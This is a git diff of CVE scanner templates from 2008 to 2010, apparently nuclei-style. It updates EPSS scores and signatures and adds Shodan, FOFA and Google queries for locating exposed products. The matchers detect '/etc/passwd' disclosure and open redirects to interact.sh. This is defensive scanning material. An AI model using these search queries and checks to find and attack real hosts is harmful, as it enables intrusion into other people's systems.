-# digest: 4a0a00473045022070fd863c2346a1262a1c6a87c2bf86b8a29a953f0bb6e8e24b6988aef07dcdde022100de1eb0f49138ab29c4ba04a2020fb9075ad7b3e9c9f82629d21eee375c325b40:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100be74cafeaf1d2052ae0a174926f0ffe1b73654dc73480253d26a6251d5a9f639022008e2f87389adf996c0386c4484fc3c007a8584f746fd2fc854c5d12bcd997ff1:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2008/CVE-2008-1061.yaml b/http/cves/2008/CVE-2008-1061.yaml
index b395ef595b..929c258686 100644
--- a/http/cves/2008/CVE-2008-1061.yaml
+++ b/http/cves/2008/CVE-2008-1061.yaml
@@ -22,14 +22,13 @@ info:
cve-id: CVE-2008-1061
cwe-id: CWE-79
epss-score: 0.00663
- epss-percentile: 0.77516
+ epss-percentile: 0.7961
cpe: cpe:2.3:a:wordpress:sniplets_plugin:1.1.2:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: wordpress
product: sniplets_plugin
tags: cve2008,cve,xss,wp-plugin,wp,edb,wpscan,wordpress,sniplets
-
flow: http(1) && http(2)
http:
@@ -63,4 +62,4 @@ http:
- type: status
status:
- 200
-# digest: 4a0a004730450220777bd4294b2dc57575646d8dc88fd119dc51c0d25f2086f36a7cdefefe5647e7022100df472d5c3da8f1e15e7c99529215af99987384e58c92d925163f10813a236e5d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450221009752c4040553333fe8225f67c3bc673afda408ff88de0319cd2b4a0bd4e7333f0220229dc9371a4b7635f2215c334754bca5387a8624d5a5f7f9476a21049803b04b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2008/CVE-2008-1547.yaml b/http/cves/2008/CVE-2008-1547.yaml
index 95335e8942..1b24dd80bf 100644
--- a/http/cves/2008/CVE-2008-1547.yaml
+++ b/http/cves/2008/CVE-2008-1547.yaml
@@ -29,6 +29,8 @@ info:
vendor: microsoft
product: exchange_server
shodan-query: http.title:"Outlook"
+ fofa-query: title="outlook"
+ google-query: intitle:"outlook"
tags: cve2008,cve,redirect,owa,exchange,microsoft
http:
@@ -43,4 +45,4 @@ http:
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
-# digest: 4b0a00483046022100add61103f83105e6e0184e371a84b94bef42e3e534eec0ba3c444c81e603b7df022100c59d3962095aa5e3dc9897e04b109f9407889fe544bd9737d9675a3b767dc339:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502210080e5ce4002e9f78ace8bc34bbc70638c4d349900438da431a2757afcb531657002203ab47f7e35668fdae30c9a1dd0dabb91bae39cfafb7a502764f1517d3e3aa8e4:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2008/CVE-2008-2650.yaml b/http/cves/2008/CVE-2008-2650.yaml
index 28a0666dd5..005162de9f 100644
--- a/http/cves/2008/CVE-2008-2650.yaml
+++ b/http/cves/2008/CVE-2008-2650.yaml
@@ -28,6 +28,7 @@ info:
max-request: 1
vendor: cmsimple
product: cmsimple
+ shodan-query: cpe:"cpe:2.3:a:cmsimple:cmsimple"
tags: cve,cve2008,lfi,cmsimple
http:
@@ -47,4 +48,4 @@ http:
- type: status
status:
- 200
-# digest: 4b0a00483046022100e337afcba9ba8a3b54040f339305e5467dbb5fda18b50da4f493484a5c5182d2022100e24c3017a7abcd267ab66ab6e255d1ed5ea56d71492bcb6afd58d3a093e618c1:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022003b63e7cd7ab09897735b1866b0ce2b3aedc493e01965112604d9981a58d09fe02200db2d75ecbfa5669fc8cc988fcf93ee338fa4d396b07f4d60bb219df3cd58bc6:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2008/CVE-2008-4764.yaml b/http/cves/2008/CVE-2008-4764.yaml
index 0bce7f19c4..5b784a3beb 100644
--- a/http/cves/2008/CVE-2008-4764.yaml
+++ b/http/cves/2008/CVE-2008-4764.yaml
@@ -17,8 +17,8 @@ info:
cvss-score: 5
cve-id: CVE-2008-4764
cwe-id: CWE-22
- epss-score: 0.02365
- epss-percentile: 0.89577
+ epss-score: 0.02135
+ epss-percentile: 0.89239
cpe: cpe:2.3:a:extplorer:com_extplorer:*:rc2:*:*:*:*:*:*
metadata:
max-request: 1
@@ -40,4 +40,4 @@ http:
- type: status
status:
- 200
-# digest: 490a004630440220233b1d67c643f2b04cc98635c1308c7fc6957ca19112156b50312a3c02301dd7022062edfca4c36a26a476f2dcbf466e092d2e1d048bd645dff71dbb23bb91ff5af5:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502210083dfc3a90c4bb3aaa2d1d85bd0eb23154e4019210fc591e51f0bded1afc7a70202205d2c129a1bb23b903372e64284d8830eabe2e9eb96e0eb5afa05c6d444afc686:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2008/CVE-2008-5587.yaml b/http/cves/2008/CVE-2008-5587.yaml
index 90bcd16ae0..71ba384ff2 100644
--- a/http/cves/2008/CVE-2008-5587.yaml
+++ b/http/cves/2008/CVE-2008-5587.yaml
@@ -21,13 +21,15 @@ info:
cve-id: CVE-2008-5587
cwe-id: CWE-22
epss-score: 0.02331
- epss-percentile: 0.88625
+ epss-percentile: 0.89734
cpe: cpe:2.3:a:phppgadmin:phppgadmin:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: phppgadmin
product: phppgadmin
shodan-query: http.title:"phpPgAdmin"
+ fofa-query: title=phppgadmin
+ google-query: intitle:phppgadmin
tags: cve,cve2008,lfi,phppgadmin,edb
http:
@@ -44,4 +46,4 @@ http:
- type: status
status:
- 200
-# digest: 4a0a00473045022100fb4daa9c228b923a61c5e11388e2e42c7b6505fe615664172911ca0429dd5ff8022077c9aa14bb0dfd6d7e046e8bce05a14403d5f060388baa3c9df3ae42469cdb77:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100912e1228880396cbbedb45de0a602506bea640e6cd8aaa621d0ec6707414e7c30220267eb7b0e7a3731120937298835fa180c09e4f109d5ef5a053292b64c87d6af7:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2008/CVE-2008-6080.yaml b/http/cves/2008/CVE-2008-6080.yaml
index cf7fc02a6b..832d03e02f 100644
--- a/http/cves/2008/CVE-2008-6080.yaml
+++ b/http/cves/2008/CVE-2008-6080.yaml
@@ -20,7 +20,7 @@ info:
cve-id: CVE-2008-6080
cwe-id: CWE-22
epss-score: 0.03314
- epss-percentile: 0.90395
+ epss-percentile: 0.9132
cpe: cpe:2.3:a:codecall:com_ionfiles:4.4.2:*:*:*:*:*:*:*
metadata:
max-request: 1
@@ -42,4 +42,4 @@ http:
- type: status
status:
- 200
-# digest: 490a0046304402205ae540f2d6cbc68c64570307fdf0bdf36a2b7acd80b4eee7f37e87fe1a215408022001a5e8067cb4740653e558dcafa619df1481f916f8dddb073b404630e6703a24:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100880770c9a32ddd553b05d2f87d9b1b190a6c3a88dfa481015ce830ac8d7f2088022073a2283b069da137fa2a4d8f3b411949d3f0d45110008d393a0cf2862f3cb013:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2008/CVE-2008-6172.yaml b/http/cves/2008/CVE-2008-6172.yaml
index 4ae86e833b..f9c097ff68 100644
--- a/http/cves/2008/CVE-2008-6172.yaml
+++ b/http/cves/2008/CVE-2008-6172.yaml
@@ -20,7 +20,7 @@ info:
cve-id: CVE-2008-6172
cwe-id: CWE-22
epss-score: 0.00509
- epss-percentile: 0.76096
+ epss-percentile: 0.76498
cpe: cpe:2.3:a:weberr:rwcards:3.0.11:*:*:*:*:*:*:*
metadata:
max-request: 1
@@ -42,4 +42,4 @@ http:
- type: status
status:
- 200
-# digest: 4b0a00483046022100c60015398304f9ce817dba9913fa3eea08043b9830cef5a4e1baeaadb99b5a0c022100d34a8d77d912dc1372e761e3ea0d4ccda3e9bcacddb4dd58752f9c53d81c8048:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100bb9dc7da389c238f3d1f51bb8eb60df5e0b9eb7c3e2613a47e3d8535a0cd36050220650d1c196b18deeb192b1c50fdffed8b36fd4412bac34a17359e495325382166:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2008/CVE-2008-6222.yaml b/http/cves/2008/CVE-2008-6222.yaml
index b7f61b6a45..13e2bf3692 100644
--- a/http/cves/2008/CVE-2008-6222.yaml
+++ b/http/cves/2008/CVE-2008-6222.yaml
@@ -13,13 +13,14 @@ info:
- https://www.exploit-db.com/exploits/6980
- https://nvd.nist.gov/vuln/detail/CVE-2008-6222
- https://exchange.xforce.ibmcloud.com/vulnerabilities/46356
+ - https://github.com/ARPSyndicate/kenzer-templates
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
cvss-score: 5
cve-id: CVE-2008-6222
cwe-id: CWE-22
- epss-score: 0.01029
- epss-percentile: 0.82175
+ epss-score: 0.01302
+ epss-percentile: 0.85861
cpe: cpe:2.3:a:joomlashowroom:pro_desk_support_center:1.0:*:*:*:*:*:*:*
metadata:
max-request: 1
@@ -41,4 +42,4 @@ http:
- type: status
status:
- 200
-# digest: 4a0a0047304502202a6b3c7843f9b11700d264ebe9e7d62ab4a3218e9f4b692e8ebb15b025cb36a70221008873d32a32de8df6cd215ab066f2fb7847612833f7b326d8d4cc071bbc0a043a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a0048304602210085ba6f15c447dffc76deb881a79fa4f92f8beb9255635e3a753f2cffcfc1dbbd022100d607c5f2aeba0c92069b3518cab335995771aa173ec4a1ed40c49cec8b43ec58:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2008/CVE-2008-6465.yaml b/http/cves/2008/CVE-2008-6465.yaml
index 76631b2aac..213d660b5b 100644
--- a/http/cves/2008/CVE-2008-6465.yaml
+++ b/http/cves/2008/CVE-2008-6465.yaml
@@ -30,6 +30,8 @@ info:
vendor: parallels
product: h-sphere
shodan-query: title:"Parallels H-Sphere
+ fofa-query: title="h-sphere"
+ google-query: intitle:"h-sphere"
tags: cve,cve2008,xss,parallels,h-sphere
http:
@@ -54,4 +56,4 @@ http:
- type: status
status:
- 200
-# digest: 490a0046304402200fe7f64211b0ac14e48925d06d09a65070632e86c47843b9217a84320880330d022078feaff899b6d7e68e8cc85f5dbbc923969ec1a18c3259c0bcea48559cd82b1a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022003fe39b5f5c4f14f5a4304fb88ee5233a61a6c4f8320e5ed5ed9cebf70ec20700220790cbb99fc446d59496ddf0e749f6c03fd0d0f9063d1d14442acabade84e4da0:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2008/CVE-2008-6668.yaml b/http/cves/2008/CVE-2008-6668.yaml
index 0d5751fe14..b1e76a79a3 100644
--- a/http/cves/2008/CVE-2008-6668.yaml
+++ b/http/cves/2008/CVE-2008-6668.yaml
@@ -21,7 +21,7 @@ info:
cve-id: CVE-2008-6668
cwe-id: CWE-22
epss-score: 0.00359
- epss-percentile: 0.71607
+ epss-percentile: 0.72128
cpe: cpe:2.3:a:dirk_bartley:nweb2fax:*:*:*:*:*:*:*:*
metadata:
max-request: 2
@@ -45,4 +45,4 @@ http:
- type: status
status:
- 200
-# digest: 490a00463044022060c84de88a71ccf8b996bea22ac6b62a2e003d9b3b8689c2d617d3e2f1ad99bc02202c59470b8795792f83ecbf5e7c7b37395db50a218f420b0fa76f2accc49d815f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502210093d53a44e7670ae91340f32f011a1cf3d1a356b259d38839794f5af89b77d20802200ece4f4130a9a1e17e778ea393395611a46cc9af56a222985f4e148afc9159e7:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2008/CVE-2008-7269.yaml b/http/cves/2008/CVE-2008-7269.yaml
index 8eaf2fb274..bef38ec236 100644
--- a/http/cves/2008/CVE-2008-7269.yaml
+++ b/http/cves/2008/CVE-2008-7269.yaml
@@ -17,8 +17,8 @@ info:
cvss-score: 5.8
cve-id: CVE-2008-7269
cwe-id: CWE-20
- epss-score: 0.01425
- epss-percentile: 0.86241
+ epss-score: 0.01544
+ epss-percentile: 0.87118
cpe: cpe:2.3:a:boka:siteengine:5.0:*:*:*:*:*:*:*
metadata:
verified: "true"
@@ -26,6 +26,7 @@ info:
vendor: boka
product: siteengine
shodan-query: html:"SiteEngine"
+ fofa-query: body="siteengine"
tags: cve,cve2008,redirect,siteengine,boka
http:
@@ -38,4 +39,4 @@ http:
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:http?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
-# digest: 4a0a00473045022100ffdf11249d57dd33b3a45982e01655bacfcd643a4c57e97aa5f891243557c3b202205fd36fccfd2f9c9afdec7d8b8b4463ac9a1d07a52b558de7a68f374cbc5bc3ce:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100b344e52e7ae31d77fb3af98c4d5022974a0aae7db6fa748c2ead62c71aa1f2ad0221009db6268e719957315f53a9c94d7d9bcce96fdca4bd6a7197b85d1bed428969a6:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2009/CVE-2009-0545.yaml b/http/cves/2009/CVE-2009-0545.yaml
index f6f14d1199..38d58ade0c 100644
--- a/http/cves/2009/CVE-2009-0545.yaml
+++ b/http/cves/2009/CVE-2009-0545.yaml
@@ -21,12 +21,15 @@ info:
cve-id: CVE-2009-0545
cwe-id: CWE-20
epss-score: 0.97081
- epss-percentile: 0.99755
+ epss-percentile: 0.99771
cpe: cpe:2.3:a:zeroshell:zeroshell:1.0:beta1:*:*:*:*:*:*
metadata:
max-request: 1
vendor: zeroshell
product: zeroshell
+ shodan-query: http.title:"zeroshell"
+ fofa-query: title="zeroshell"
+ google-query: intitle:"zeroshell"
tags: cve,cve2009,edb,zeroshell,kerbynet,rce
http:
@@ -39,4 +42,4 @@ http:
part: body
regex:
- "root:.*:0:0:"
-# digest: 4b0a00483046022100b390e617f8d9be114aea50840c529aab08fac1822e4dece7746cb7733a409631022100b30c36b38ea49931b16615862de2267a59370daf662b7e77c88b25add453fb8e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502210086897c4a89ba3180b412adb9e2515a6dc81be03c34ce7b8c4f7059efc87adb38022075f0afa4057f34ad3b734c8a7d4fcd6fb8c7adf9ff68351baf948f2ecce764bb:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2009/CVE-2009-0932.yaml b/http/cves/2009/CVE-2009-0932.yaml
index 4c4a3f433d..24bc9aaba4 100644
--- a/http/cves/2009/CVE-2009-0932.yaml
+++ b/http/cves/2009/CVE-2009-0932.yaml
@@ -21,7 +21,7 @@ info:
cve-id: CVE-2009-0932
cwe-id: CWE-22
epss-score: 0.04048
- epss-percentile: 0.919
+ epss-percentile: 0.92091
cpe: cpe:2.3:a:debian:horde:3.2:*:*:*:*:*:*:*
metadata:
max-request: 1
@@ -43,4 +43,4 @@ http:
- type: status
status:
- 200
-# digest: 490a004630440220752ee73ce2196cc54c39a5e60377c58c87e7ef7ef489fd990d2b463b6ddd900402204885ac378662f0bf728920184aab940b6d54ebdb022e1767ebc9b7e4283d8ad1:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100edfe0bfde8e2accddd711cbcb56d79be3056b26669bafe2f3b6cb9a91913a64002202d6da59dfba62472076866b6bd692f3639a1ffade4e7b4445cc2e3e12db22ebe:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2009/CVE-2009-1151.yaml b/http/cves/2009/CVE-2009-1151.yaml
index b874ede337..a5a63a7618 100644
--- a/http/cves/2009/CVE-2009-1151.yaml
+++ b/http/cves/2009/CVE-2009-1151.yaml
@@ -20,13 +20,17 @@ info:
cvss-score: 7.5
cve-id: CVE-2009-1151
cwe-id: CWE-94
- epss-score: 0.79256
- epss-percentile: 0.98197
+ epss-score: 0.79939
+ epss-percentile: 0.983
cpe: cpe:2.3:a:phpmyadmin:phpmyadmin:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: phpmyadmin
product: phpmyadmin
+ shodan-query: http.title:"phpmyadmin"
+ fofa-query: title="phpmyadmin"
+ google-query: intitle:"phpmyadmin"
+ hunter-query: app.name="phpmyadmin"&&web.body="pma_servername"&&web.body="4.8.4"
tags: cve,cve2009,deserialization,kev,vulhub,phpmyadmin,rce
http:
@@ -49,4 +53,4 @@ http:
- type: status
status:
- 200
-# digest: 4a0a00473045022100d034c615116d4e4388066b8ecd70006fb486a97f1893f14acdd83c4b1d48a2ec02200b87edb8aa8815371b589ebc0773ca1f591ef511e9f6dfb2c4a6bdc6cfc624f8:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100bcb661005ec46d39a8b90cca079e6e94bcdfcd7cc10b0b4b21a007623a914cdc02200aedd6c2f81799c703ef979fe9ab6d86b014ea31fb9ae6c244b1688f3248ac39:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2009/CVE-2009-1872.yaml b/http/cves/2009/CVE-2009-1872.yaml
index fdad6c137f..7bc7dbdd0a 100644
--- a/http/cves/2009/CVE-2009-1872.yaml
+++ b/http/cves/2009/CVE-2009-1872.yaml
@@ -29,6 +29,8 @@ info:
vendor: adobe
product: coldfusion
shodan-query: http.component:"Adobe ColdFusion"
+ fofa-query: title="coldfusion administrator login"
+ google-query: intitle:"coldfusion administrator login"
tags: cve2009,cve,adobe,xss,coldfusion,tenable
http:
@@ -51,4 +53,4 @@ http:
- type: status
status:
- 200
-# digest: 4a0a0047304502210099e04590b72f5f59dff9760d627e7042601a45b16bea2c23852fa76186fae5ab0220361a0788e7674d6ed82b5e924aace4e3d604f237ac2666fa79b1e91830fd2e1a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502203366821ed2b22b2b05bab6a493a7c7c5db231fd6a6d80f9202908b447721a0b3022100dcfc043de885b54179a0e02dfbb7a4e986a33db1f9ef2f0cbd346b21ba783e65:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2009/CVE-2009-2100.yaml b/http/cves/2009/CVE-2009-2100.yaml
index 68f9595bb0..6f8dab2a39 100644
--- a/http/cves/2009/CVE-2009-2100.yaml
+++ b/http/cves/2009/CVE-2009-2100.yaml
@@ -18,8 +18,8 @@ info:
cvss-score: 5
cve-id: CVE-2009-2100
cwe-id: CWE-22
- epss-score: 0.00779
- epss-percentile: 0.80973
+ epss-score: 0.02365
+ epss-percentile: 0.89809
cpe: cpe:2.3:a:joomla:joomla:*:*:*:*:*:*:*:*
metadata:
max-request: 1
@@ -41,4 +41,4 @@ http:
- type: status
status:
- 200
-# digest: 490a004630440220011b812bacaed12772d45c7485d04136e35b9196b4c435b488601681c7bb3be50220722ab9dd33d98de09bfaec078bfd702692da5772714e412426ee37084ac9b862:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100868c8dad66aea364683d9a4e38139c1e040c1cb3b792e827191f2b16824d29ea0220642e61d2850862c9a2dc3795c395d80f33aa951bcfc657a88eec1aa9cf9a1c60:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2009/CVE-2009-3318.yaml b/http/cves/2009/CVE-2009-3318.yaml
index 4ab40ddac3..e38cbd12d9 100644
--- a/http/cves/2009/CVE-2009-3318.yaml
+++ b/http/cves/2009/CVE-2009-3318.yaml
@@ -19,8 +19,8 @@ info:
cvss-score: 7.5
cve-id: CVE-2009-3318
cwe-id: CWE-22
- epss-score: 0.00706
- epss-percentile: 0.79951
+ epss-score: 0.01062
+ epss-percentile: 0.84107
cpe: cpe:2.3:a:joomla:joomla:*:*:*:*:*:*:*:*
metadata:
max-request: 1
@@ -42,4 +42,4 @@ http:
- type: status
status:
- 200
-# digest: 4b0a00483046022100bc8b6fb22e490512109118ecf32279b8742eb0391a184c91700c91da8b4591eb022100c82312184befa6261e4804c856191e828d49e06fd6f09184837202906a4f1d4e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450221008ae69089dedcbf57111b3c504146d466dfe72254c0dd6fc4e377fe1d00b5ffec02200249cdd3548781a034d4e37670e19c65011269b24a6d1e24b2347a071823c5ac:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2009/CVE-2009-4202.yaml b/http/cves/2009/CVE-2009-4202.yaml
index 303920760a..1968203952 100644
--- a/http/cves/2009/CVE-2009-4202.yaml
+++ b/http/cves/2009/CVE-2009-4202.yaml
@@ -14,18 +14,21 @@ info:
- http://www.vupen.com/english/advisories/2009/1494
- https://nvd.nist.gov/vuln/detail/CVE-2009-4202
- http://www.exploit-db.com/exploits/8870
+ - https://github.com/ARPSyndicate/kenzer-templates
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P
cvss-score: 7.5
cve-id: CVE-2009-4202
cwe-id: CWE-22
- epss-score: 0.01956
- epss-percentile: 0.87449
+ epss-score: 0.01917
+ epss-percentile: 0.88567
cpe: cpe:2.3:a:joomla:joomla\!:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: joomla
product: joomla\!
+ shodan-query: http.html:"joomla! - open source content management"
+ fofa-query: body="joomla! - open source content management"
tags: cve,cve2009,joomla,lfi,photo,edb
http:
@@ -42,4 +45,4 @@ http:
- type: status
status:
- 200
-# digest: 4a0a0047304502202c777774f99408aa53f9024ed173c4b5f653295367409e9b42c256336d3a3ad4022100ea93147fd00a0eba5c9c1ff6e8a48bba81f4df36c20ecf450a8a67a0b887c5cf:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100efe6e513aba3433f4ab0e1ef88eef287e7ee05c7abf8fb8ab86be22812dacaf002202412942f6b20de9136e4cd40ec9fcecc068f4830dc2e06810835f8d32346850a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2009/CVE-2009-4223.yaml b/http/cves/2009/CVE-2009-4223.yaml
index 22f0057f54..f60b8f63e8 100644
--- a/http/cves/2009/CVE-2009-4223.yaml
+++ b/http/cves/2009/CVE-2009-4223.yaml
@@ -21,7 +21,7 @@ info:
cve-id: CVE-2009-4223
cwe-id: CWE-94
epss-score: 0.00611
- epss-percentile: 0.764
+ epss-percentile: 0.78606
cpe: cpe:2.3:a:gianni_tommasi:kr-php_web_content_server:*:beta_2:*:*:*:*:*:*
metadata:
max-request: 1
@@ -44,4 +44,4 @@ http:
- type: status
status:
- 200
-# digest: 4b0a00483046022100b7331565010d84c002b7cf2f7a86ffaad9ed7987a6af7ed386d0c1fdfc4a2870022100ad93d7312e808e09e1bafe8a62c52b228ef426c7d5a7dcce76a2d12acb50c0fa:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100e9c3e6842d7f2bd870dfaccb44cf7967e101052b3c7d1f03127000e7910fae26022100de227729def8c5184e4407e309b448a502c7ee7eb2d00d96cbd5ee0dd88a864d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2009/CVE-2009-5020.yaml b/http/cves/2009/CVE-2009-5020.yaml
index eaeb45c307..aedfce43ac 100644
--- a/http/cves/2009/CVE-2009-5020.yaml
+++ b/http/cves/2009/CVE-2009-5020.yaml
@@ -11,18 +11,20 @@ info:
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2009-5020
- http://awstats.sourceforge.net/docs/awstats_changelog.txt
+ - https://github.com/ARPSyndicate/kenzer-templates
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:P
cvss-score: 5.8
cve-id: CVE-2009-5020
cwe-id: CWE-20
- epss-score: 0.00215
- epss-percentile: 0.59474
+ epss-score: 0.00253
+ epss-percentile: 0.65112
cpe: cpe:2.3:a:awstats:awstats:*:*:*:*:*:*:*:*
metadata:
max-request: 2
vendor: awstats
product: awstats
+ shodan-query: cpe:"cpe:2.3:a:laurent_destailleur:awstats"
tags: cve2009,cve,redirect,awstats
http:
@@ -37,4 +39,4 @@ http:
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1
-# digest: 4b0a00483046022100e3ee0cfc04525ca64e6f63073fa38f5db6ee44776907c68d8f5e190a19649a9a022100c21acec79450886ccc34a6c7737411102d641536ee3d33788522fb5fd5cf6f15:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100cb00fd3c4ce5a26ed6ab80d774267c399a5e2335eea586b3738ef156824058df022066feb85d7c51ff28bc5fbfaf7b0223531b5ec997f1dbcac45c0bdfefb62af202:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2010/CVE-2010-0157.yaml b/http/cves/2010/CVE-2010-0157.yaml
index 40caec65d8..2085401446 100644
--- a/http/cves/2010/CVE-2010-0157.yaml
+++ b/http/cves/2010/CVE-2010-0157.yaml
@@ -18,13 +18,15 @@ info:
cvss-score: 7.5
cve-id: CVE-2010-0157
cwe-id: CWE-22
- epss-score: 0.00826
- epss-percentile: 0.80104
+ epss-score: 0.23423
+ epss-percentile: 0.96555
cpe: cpe:2.3:a:joomla:joomla\!:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: joomla
product: joomla\!
+ shodan-query: http.html:"joomla! - open source content management"
+ fofa-query: body="joomla! - open source content management"
tags: cve2010,cve,joomla,lfi,edb,packetstorm
http:
@@ -41,4 +43,4 @@ http:
- type: status
status:
- 200
-# digest: 490a0046304402201cc2638735aba64e480061e91a176acb1c5f885f26e50501697f8b444a66148b022075cccef4a1b6548b587c832158f624aa4192a98032f60e9f65fa9f9ec519b465:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100b15ae99c1d3ca2f1233aaf0e788295b69ad7e6ae16c2b9fba81288856eb9a80d022100c80b87d9c65025ddf0900359653ba13d0908fe452d36752aa801ad1e761dcf47:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2010/CVE-2010-0219.yaml b/http/cves/2010/CVE-2010-0219.yaml
index 162fed1a75..12954e5e22 100644
--- a/http/cves/2010/CVE-2010-0219.yaml
+++ b/http/cves/2010/CVE-2010-0219.yaml
@@ -21,13 +21,14 @@ info:
cve-id: CVE-2010-0219
cwe-id: CWE-255
epss-score: 0.97509
- epss-percentile: 0.99981
+ epss-percentile: 0.99984
cpe: cpe:2.3:a:apache:axis2:1.3:*:*:*:*:*:*:*
metadata:
max-request: 2
vendor: apache
product: axis2
shodan-query: http.html:"Apache Axis"
+ fofa-query: body="apache axis"
tags: cve,cve2010,axis,apache,default-login,axis2
http:
@@ -61,4 +62,4 @@ http:
- type: status
status:
- 200
-# digest: 490a0046304402207ae0781d6298d63fef1e109c6941979f3a9cf2cf97cf52d54fbf5506d103256d02202ab0a38916296abc146346b756d193740490f3a762c1929bf019e92da272776c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022022201edc111a0f266f0cf4c0d27ad5fab474e474c3089690ad2ced0012bfaaa5022100e9a88bf679f5d29f8d752596eb8e02f41fc06863def5fadeea4f4aa13a50c2c2:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2010/CVE-2010-0467.yaml b/http/cves/2010/CVE-2010-0467.yaml
index 192e0ec010..1bd35cc90f 100644
--- a/http/cves/2010/CVE-2010-0467.yaml
+++ b/http/cves/2010/CVE-2010-0467.yaml
@@ -20,7 +20,7 @@ info:
cve-id: CVE-2010-0467
cwe-id: CWE-22
epss-score: 0.06955
- epss-percentile: 0.93792
+ epss-percentile: 0.93927
cpe: cpe:2.3:a:chillcreations:com_ccnewsletter:1.0.5:*:*:*:*:*:*:*
metadata:
max-request: 1
@@ -42,4 +42,4 @@ http:
- type: status
status:
- 200
-# digest: 490a0046304402202f4ff2ab58c70983fdbde0ee6860d7cb8229e81af51ace5e3e15533082c69a2d022072359ac609c3461da4901b3bb8ccaf83fcf42ccd7e480a74fec618aadba9dcfe:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502200ffa1c79f56c51843e4ae33aade889343bc08e2cd48e34c96a18b426025d6fe8022100f0293ac85b2c273b5a96d641fd43b6aedb6c0408da0ddd0729d63ca2e87e81ca:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2010/CVE-2010-0759.yaml b/http/cves/2010/CVE-2010-0759.yaml
index 4619ccc6cf..6aaf2895d7 100644
--- a/http/cves/2010/CVE-2010-0759.yaml
+++ b/http/cves/2010/CVE-2010-0759.yaml
@@ -20,7 +20,7 @@ info:
cve-id: CVE-2010-0759
cwe-id: CWE-22
epss-score: 0.01569
- epss-percentile: 0.86974
+ epss-percentile: 0.87232
